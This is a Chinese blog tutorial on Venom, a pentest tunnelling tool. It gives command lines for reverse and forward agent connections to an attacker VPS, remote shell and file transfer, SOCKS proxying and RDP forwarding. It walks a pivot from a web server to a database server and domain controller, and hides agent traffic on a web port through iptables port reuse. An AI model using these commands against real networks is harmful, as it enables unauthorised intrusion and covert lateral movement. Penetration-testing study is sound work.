内网穿透工具-venom

该博客介绍了 Venom 工具的使用,包括反向连接和正向连接方式,展示了如何在不同场景下配置admin和agent节点进行连接。还详细讲解了如何搭建socks代理和端口复用功能,特别是在Windows和Linux环境下利用iptables进行端口复用,并提到了在程序异常结束时清理iptables规则的重要性。Venom在渗透测试和网络攻防中起到了关键作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

venom

反向连接和正向连接

admin节点和agent节点均可监听连接也可发起连接

admin监听端口,agent发起连接:

./admin_macos_x64 -lport 9999
./agent_linux_x64 -rhost 192.168.0.103 -rport 9999

agent监听端口,admin发起连接:

./agent_linux_x64 -lport 8888
./admin_macos_x64 -rhost 192.168.204.139 -rport 8888

网络拓扑图

hack(10.1.1.1) ----->vps(1.1.1.1) ------->web边界服务器(2.2.2.2:192.168.1.1)------->
内网数据库服务器(192.168.1.2:172.16.1.1)
dc(172.16.1.2)
vps监听
admin.exe  -lport 12345  -passwd 123
web服务器
agent.exe -rport 12345 -rhost 1.1.1.1
show 查看会话

getdes 查看会话信息
setdes [info] 添加会话信息
goto [id] 切换会话
listen [lport] 监听
connect [rhost] [rport] 连接venom服务端
sshconnect [user@ip:port] [dport] ssh隧道连接
shell
upload [本地文件] [受控机路径] 上传
download [remote_file] [local_file]
socks [lport] socks5代理
lforward [lhost] [sport] [dport]
rforward [rhost] [sport] [dport]

lforward 127.0.0.1 4444 4444
rforward 192.168.1.1 3389 3389
连接127.0.0.1:3389
rforward 将node1网段的192.168.1.1端口3389转发到admin节点本地的3389端口

在这里插入图片描述

如果要攻击dc

    goto 1

	进入web边界服务器venom

	socks 1111

	配置好代理 socks5@1.1.1.1:1111

    拿下数据库服务器,在web服务器上使用
	goto 1
	反向连接:
        listen 4444
        在数据库服务器上
        agent.exe -rport 4444 -rhost 192.168.1.1 -passwd 123
        
    正向连接:
        connect 192.168.1.2 4444
        在数据库服务器上
        agent.exe -lport 4444 -passwd 123
        反向连接
        
    继续搭建socks代理,可以访问dc

端口复用

agent节点支持端口复用

agent提供了两种端口复用方法

  1. 通过SO_REUSEPORT和SO_REUSEADDR选项进行端口复用
  2. 通过iptables进行端口复用(仅支持Linux平台)

通过venom提供的端口复用功能,在windows上可以复用apache、mysql等在这里插入图片描述
服务的端口,暂时无法复用RDP、IIS等服务端口,在linux上可以复用多数服务端口。被复用的端口仍可正常对外提供其原有服务。

第一种端口复用方法

# 以windows下apache为例
# 复用apache 80端口,不影响apache提供正常的http服务
# -h 的值为本机ip,不能写0.0.0.0,否则无法进行端口复用
./agent.exe -lhost 192.168.3.144 -reuse-port 80

./admin.exe -rhost 192.168.3.144 -rport 80

第二种端口复用方法

# 以linux下apache为例
# 需要root权限
sudo ./agent_linux_x64 -lport 8080 -reuse-port 80

这种端口复用方法会在本机设置iptables规则,将reuse-port的流量转发到lport,再由agent分发流量

需要注意一点,如果通过sigtermsigint信号结束程序(kill或ctrl-c),程序可以自动清理iptables规则。如果agent被kill -9杀掉则无法自动清理iptables规则,需要手动清理,因为agent程序无法处理sigkill信号。

为了避免iptables规则不能自动被清理导致渗透测试者无法访问80端口服务,所以第二种端口复用方法采用了iptables -m recent通过特殊的tcp包控制iptables转发规则是否开启。

这里的实现参考了 https://threathunter.org/topic/594545184ea5b2f5516e2033

# 启动agent在linux主机上设置的iptables规则
# 如果rhost在内网,可以使用socks5代理脚本流量,socks5代理的使用见下文
python scripts/port_reuse.py --start --rhost 192.168.204.135 --rport 80

# 连接agent节点
./admin_macos_x64 -rhost 192.168.204.135 -rport 80

# 如果要关闭转发规则
python scripts/port_reuse.py --stop --rhost 192.168.204.135 --rport 80
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值